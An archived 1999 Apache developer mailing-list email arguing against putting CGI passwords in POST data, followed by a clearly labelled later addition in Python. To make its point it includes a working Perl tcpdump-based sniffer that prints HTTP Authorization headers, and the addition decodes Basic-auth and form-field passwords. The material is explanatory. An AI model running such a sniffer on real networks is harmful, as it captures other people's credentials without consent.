Return-Path:
Delivered-To: new-httpd-archive@hyperreal.org
Received: (qmail 6204 invoked by uid 6000); 4 Aug 1999 13:23:58 -0000
Received: (qmail 6193 invoked from network); 4 Aug 1999 13:23:56 -0000
Received: from astro.fccj.cc.fl.us (207.203.47.7) by taz.hyperreal.org with SMTP; 4 Aug 1999 13:23:56 -0000
Received: from [207.203.95.5] (elroy.fccj.org [207.203.95.5]) by astro.fccj.cc.fl.us (8.9.1/8.9.1) with ESMTP id JAA06438 for ; Wed, 4 Aug 1999 09:20:59 -0400 (EDT)
Message-Id: <199908041320.JAA06438@astro.fccj.cc.fl.us>
X-Mailer: Microsoft Outlook Express Macintosh Edition - 4.5 (0410)
Date: Wed, 04 Aug 1999 09:25:19 -0400
Subject: Re: Passing passwords to CGI
From: "Bill Jones"
To: new-httpd@apache.org
Mime-version: 1.0
X-Priority: 3
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: new-httpd-owner@apache.org
Precedence: bulk
Reply-To: new-httpd@apache.org
Status: O

Graham wrote:

> Dirk-Willem van Gulik wrote:
>
>> > Is there a "correct" way of doing this?
>>
>> No, of course not :-) but the solution is
>>
>> Adding to your cflags
>>
>> CFLAGS += -DSECURITY_HOLE_PASS_AUTHORIZATION
>>
>> Do a grep in the source (util_script.c) for the full story.
>
> Here's a thought - how about including the capability for passwords to
> be inserted into the POST data that a CGI reads via stdin, i.e. the
> password could be read as if it was simply another option on a form.
>
> The name of this POST variable would be configurable so it didn't clash
> with any existing variables in CGI.
>
> Is this a good idea? If so, I'll try to get it to work.
>
> Regards,
> Graham

Here is why you don't want to do that:

#!/usr/bin/perl
# Passive sniffer: watches traffic to port 80 and prints every request line
# and HTTP authentication header as it crosses the wire.  Expects the hex-dump
# layout of 1999-era tcpdump (a packet summary line such as
# "a.b.c.d.1234 > e.f.g.h.80: P 1:50(49) ..." followed by indented lines of
# bare hex pairs); newer tcpdump prints offsets and "Flags [P.]", so the two
# regexes below need adjusting there.  Needs root for raw packet capture.
use strict;
use warnings;

my $LIMIT = shift || 5000000;   # stop after this many packets
$| = 1;                         # unbuffered output: print hits as they happen

# Reopen STDIN on a pipe from tcpdump: -l line buffered, -n no DNS lookups,
# -x hex dump of the packet, -s 1024 capture up to 1024 bytes per packet.
open(STDIN, "/usr/sbin/tcpdump -lnx -s 1024 dst port 80|")
    or die "cannot run tcpdump: $!";

my ($client, $host, $packet);
while (<>) {
    if (/^\S/) {                # packet summary line (hex lines are indented)
        last unless $LIMIT--;
        # Report the interesting lines of the packet just reassembled.
        while (defined $packet
               && $packet =~ /(GET|POST|WWW-Authenticate|Authorization).+/g) {
            print "$client -> $host\t$&\n";
        }
        undef $client; undef $host; undef $packet;
        # Only follow packets that carry data (PUSH with a non-zero length).
        ($client, $host) = /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/
            if /P \d+:\d+\((\d+)\)/ && $1 > 0;
        next;                   # the summary line itself is not payload
    }
    next unless $client && $host;
    s/\s+//;                                 # drop the leading indentation
    s/([0-9a-f]{2})\s?/chr(hex($1))/eg;      # hex pairs -> raw bytes
    tr/\x1F-\x7E\r\n//cd;                    # keep only printable text
    $packet .= $_;
}

/^HTH$/i;

-Sneex- :]
______________________________________________________________________
Bill Jones
Data Security Specialist
http://www.fccj.org/cgi/mail?dss
http://certserver.pgp.com:11371/pks/lookup?op=get&search=0x37EFC00F
http://www.networksolutions.com/cgi-bin/whois/whois?BJ1936

Jacksonville Perl Mongers
http://jacksonville.pm.org
jax@jacksonville.pm.org
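The point of the sniffer above is that a password on a plaintext HTTP connection is readable wherever the protocol puts it. The following is an added example, not code from the thread, from Bill Jones or from the Apache project: it takes one request as a sniffer would reassemble it and recovers the password both from a Basic Authorization header (base64 is an encoding, not encryption) and from the kind of POST form field Graham proposes. The request, the host www.example.org, the credentials and the field name cgipass are constructed for illustration and are assumptions of this example.

```python
"""Added example (not from the original thread): recover a password from a
plaintext HTTP request whether it is carried in a Basic Authorization header
or in a POST form field.  The request below is constructed by hand; the host,
the credentials and the field name 'cgipass' are invented for illustration."""
import base64
import re
from urllib.parse import parse_qs

# What a sniffer such as the Perl script above would reassemble from the wire
# for one request (constructed sample, not captured traffic).
SAMPLE_REQUEST = (
    b"POST /cgi-bin/login.cgi HTTP/1.0\r\n"
    b"Host: www.example.org\r\n"
    b"Authorization: Basic " + base64.b64encode(b"alice:s3cret") + b"\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 35\r\n"
    b"\r\n"
    b"user=alice&cgipass=s3cret&page=home"
)

# The same grep the Perl sniffer applies to each reassembled packet.
INTERESTING = re.compile(rb"^(GET|POST|WWW-Authenticate|Authorization)[^\r\n]*", re.M)


def interesting_lines(raw):
    """Request lines and authentication headers, as the sniffer would print them."""
    return [m.group(0).decode("ascii", "replace") for m in INTERESTING.finditer(raw)]


def extract_credentials(raw, password_field="cgipass"):
    """Parse one raw HTTP request and pull out every place a password appears."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()

    found = {"request": lines[0].decode("ascii", "replace")}

    # Basic auth is base64, not encryption: one decode yields user:password.
    auth = headers.get(b"authorization", b"")
    scheme, _, token = auth.partition(b" ")
    if scheme.lower() == b"basic" and token:
        user, _, password = base64.b64decode(token).decode("latin-1").partition(":")
        found["basic_user"] = user
        found["basic_password"] = password

    # A password moved into the POST body is just another form field.
    ctype = headers.get(b"content-type", b"").lower()
    if ctype.startswith(b"application/x-www-form-urlencoded"):
        form = parse_qs(body.decode("ascii", "replace"), keep_blank_values=True)
        if password_field in form:
            found["form_password"] = form[password_field][0]
    return found


if __name__ == "__main__":
    for line in interesting_lines(SAMPLE_REQUEST):
        print(line)
    print(extract_credentials(SAMPLE_REQUEST))
```

Run it as a script to see both recoveries side by side; the only thing that keeps either form of the password off the wire is transport encryption, not the choice between a header and a form field.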